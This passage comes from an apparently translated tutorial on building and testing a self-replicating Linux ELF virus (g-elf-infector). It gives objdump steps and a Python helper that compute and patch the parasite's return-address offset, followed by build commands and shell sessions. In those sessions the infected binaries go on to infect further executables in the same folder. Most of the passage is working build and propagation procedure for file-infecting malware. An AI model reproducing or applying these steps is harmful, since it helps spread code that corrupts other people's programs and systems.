First obtain the length of the parasite code, then adjust the #define PARACODE_LENGTH definition in gvirus.c accordingly:

grip2@linux:~/tmp/virus> ./gei -l        <- this prints the length of the parasite code
Parasite code length: 1744
Next obtain the start address of the parasite code and the address of the 0xaabbccdd placeholder, and from them compute the offset of the slot that will hold the return address:

grip2@linux:~/tmp/virus> objdump -d gei|grep aabbccdd
 8049427:       68 dd cc bb aa          push   $0xaabbccdd
grip2@linux:~/tmp/virus> objdump -d gei|grep ""
08048d80 :
 8049450:       e9 2b f9 ff ff          jmp    8048d80
grip2@linux:~/tmp/virus> objdump -d gei|grep ":"
08048d80 :
Subtracting 0x8048d80 from 0x8049427 gives the offset we need, 0x6a7; use this value to update the #define PARACODE_RETADDR_ADDR_OFFSET macro in gvirus.h. Two sanity checks are worth doing before rebuilding. First, the offset computed this way points at the push opcode (0x68); its 4-byte immediate 0xaabbccdd begins one byte later, so make sure the macro is consumed in gvirus.c in the same way it was computed here. Second, 0x8048d80 + 1744 = 0x8049450, i.e. the parasite ends exactly where the jmp 8048d80 shown at 0x8049450 begins, so the length reported by ./gei -l agrees with the disassembly.
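The address arithmetic above can be automated instead of being read off objdump by hand. The following Python helper is an added example and is not part of the g-elf-infector sources: it parses the ELF32 program headers to translate the parasite's virtual addresses into file offsets, pulls PARACODE_LENGTH bytes out of the image, locates the single `push $0xaabbccdd` (opcode 0x68 followed by the little-endian immediate) and returns its offset, which is the PARACODE_RETADDR_ADDR_OFFSET value. The `patch_retaddr` function shows one plausible way of using that offset (overwriting the immediate one byte past the opcode); the page does not show how gvirus.c actually consumes the macro, so that part is an assumption. `build_sample_elf` constructs a stand-in for gei laid out with the page's numbers (file mapped at 0x8048000, parasite of 1744 bytes at 0x8048d80, placeholder at 0x8049427) so that the script runs offline.

```python
"""Automate the manual objdump/grep step: map the parasite's virtual addresses
to file offsets in a 32-bit ELF, extract the parasite bytes, find the single
`push $0xaabbccdd` placeholder and report PARACODE_RETADDR_ADDR_OFFSET.

Added example, not part of g-elf-infector. Assumes only what the page shows:
an x86 ELF32 image, a parasite of PARACODE_LENGTH bytes at a known VA, and one
`push imm32` (68 dd cc bb aa) inside it.
"""
import struct

PLACEHOLDER = 0xAABBCCDD
PUSH_IMM32 = b"\x68" + struct.pack("<I", PLACEHOLDER)   # 68 dd cc bb aa

ELF32_EHDR = "<16sHHIIIIIHHHHHH"   # 52-byte Elf32_Ehdr
ELF32_PHDR = "<IIIIIIII"           # 32-byte Elf32_Phdr
PT_LOAD = 1


def load_segments(elf):
    """Yield (p_offset, p_vaddr, p_filesz) for every PT_LOAD program header."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1:          # ELFCLASS32 only
        raise ValueError("not an ELF32 image")
    hdr = struct.unpack_from(ELF32_EHDR, elf, 0)
    e_phoff, e_phentsize, e_phnum = hdr[5], hdr[9], hdr[10]
    if e_phentsize != struct.calcsize(ELF32_PHDR):
        raise ValueError("unexpected e_phentsize %#x" % e_phentsize)
    for i in range(e_phnum):
        ph = struct.unpack_from(ELF32_PHDR, elf, e_phoff + i * e_phentsize)
        if ph[0] == PT_LOAD:
            yield ph[1], ph[2], ph[4]                 # p_offset, p_vaddr, p_filesz


def va_to_file_offset(elf, va):
    """Translate a virtual address into the file offset that backs it."""
    for p_offset, p_vaddr, p_filesz in load_segments(elf):
        if p_vaddr <= va < p_vaddr + p_filesz:
            return va - p_vaddr + p_offset
    raise ValueError("va %#x is not backed by file bytes" % va)


def extract_parasite(elf, start_va, length):
    """Copy PARACODE_LENGTH bytes of parasite code out of the image."""
    off = va_to_file_offset(elf, start_va)
    if off + length > len(elf):
        raise ValueError("parasite runs past end of file")
    return elf[off:off + length]


def retaddr_offset(code):
    """Offset of the `push $0xaabbccdd` opcode inside the parasite, i.e. the
    value obtained above as 0x8049427 - 0x8048d80. Fails if the placeholder is
    missing or occurs more than once, since patching would then be ambiguous."""
    hits = [i for i in range(len(code)) if code.startswith(PUSH_IMM32, i)]
    if len(hits) != 1:
        raise ValueError("expected exactly one placeholder, found %d" % len(hits))
    return hits[0]


def patch_retaddr(code, real_entry):
    """Assumed use of the offset: overwrite the imm32 (one byte after the
    0x68 opcode) with the host's real entry point."""
    imm = retaddr_offset(code) + 1
    return code[:imm] + struct.pack("<I", real_entry) + code[imm + 4:]


def build_sample_elf():
    """Constructed stand-in for gei using the page's numbers: the file is
    mapped at 0x8048000, the 1744-byte parasite starts at 0x8048d80 and holds
    `push $0xaabbccdd ; ret` at 0x8049427. Everything else is nop or zero."""
    base, start_va, length = 0x08048000, 0x08048D80, 1744
    code = bytearray(b"\x90" * length)
    push_at = 0x08049427 - start_va                   # 0x6a7
    code[push_at:push_at + 6] = PUSH_IMM32 + b"\xc3"
    image = bytearray(start_va - base + length)
    image[start_va - base:] = code
    e_ident = b"\x7fELF\x01\x01\x01" + b"\0" * 9       # class32, LSB, version 1
    image[:52] = struct.pack(ELF32_EHDR, e_ident, 2, 3, 1, start_va,
                             52, 0, 0, 52, 32, 1, 40, 0, 0)
    image[52:84] = struct.pack(ELF32_PHDR, PT_LOAD, 0, base, base,
                               len(image), len(image), 5, 0x1000)
    return bytes(image)


if __name__ == "__main__":
    elf = build_sample_elf()
    code = extract_parasite(elf, 0x08048D80, 1744)
    print("PARACODE_RETADDR_ADDR_OFFSET = %#x" % retaddr_offset(code))
```

To run it against the real binary, replace `build_sample_elf()` with `open("gei", "rb").read()` and pass the parasite start address and the length printed by `./gei -l`; the uniqueness check in `retaddr_offset` catches the case where the compiler emitted the 0xaabbccdd constant more than once, which a plain `grep aabbccdd` would only reveal by showing two lines.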
Rebuild:

grip2@linux:~/tmp/virus> make clean
rm *.o -rf
rm foo -rf
rm gei -rf
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
grip2@linux:~/tmp/virus> ls
gei  gsyscall.h  gvirus.c  gvirus.o  foo.c  parasite-sample.c  g-elf-infector.c  gunistd.h  gvirus.h  foo  Makefile  parasite-sample.h
Create a test directory and try it out:

grip2@linux:~/tmp/virus> mkdir test
grip2@linux:~/tmp/virus> cp gei foo test
grip2@linux:~/tmp/virus> cd test
grip2@linux:~/tmp/virus/test> ls
gei  foo
grip2@linux:~/tmp/virus/test> cp foo h
Build the infected program:

grip2@linux:~/tmp/virus/test> ./gei h
file size: 8668
e_phoff: 00000034
e_shoff: 00001134
e_phentsize: 00000020
e_phnum: 00000008
e_shentsize: 00000028
e_shnum: 00000025
text segment file offset: 0
[15 sections patched]
grip2@linux:~/tmp/virus/test> ll
total 44
-rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users  8668 2004-12-13 07:50 foo
Run the infected program:

grip2@linux:~/tmp/virus/test> ./h
.
..
gei
foo
h
.backup.h
real elf point
grip2@linux:~/tmp/virus/test> ll
total 52
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo

Note the sizes: gei has grown from 14211 to 18307 bytes and foo from 8668 to 12764, i.e. each by exactly 4096 bytes (one page), so running h has infected both of them.
Now check whether the programs infected by the run above infect further ELF programs themselves:

grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
Better luck next file
foo
h
Better luck next file
.backup.h
Better luck next file
real elf point

OK, it works.

grip2@linux:~/tmp/virus/test> cp ../foo hh
grip2@linux:~/tmp/virus/test> ll
total 64
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users  8668 2004-12-13 07:51 hh
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
Better luck next file
foo
h
Better luck next file
.backup.h
Better luck next file
hh
real elf point
grip2@linux:~/tmp/virus/test>

The files that were already infected are skipped with "Better luck next file", while the freshly copied clean hh is listed without that message, so it was infected by this run.
6. Summary

Since I am neither a virus coder nor an anti-virus coder, my grasp of virus techniques is bound to have gaps. If the description of the virus techniques in this article is not accurate enough, or the analysis not thorough enough, please point it out. Thank you.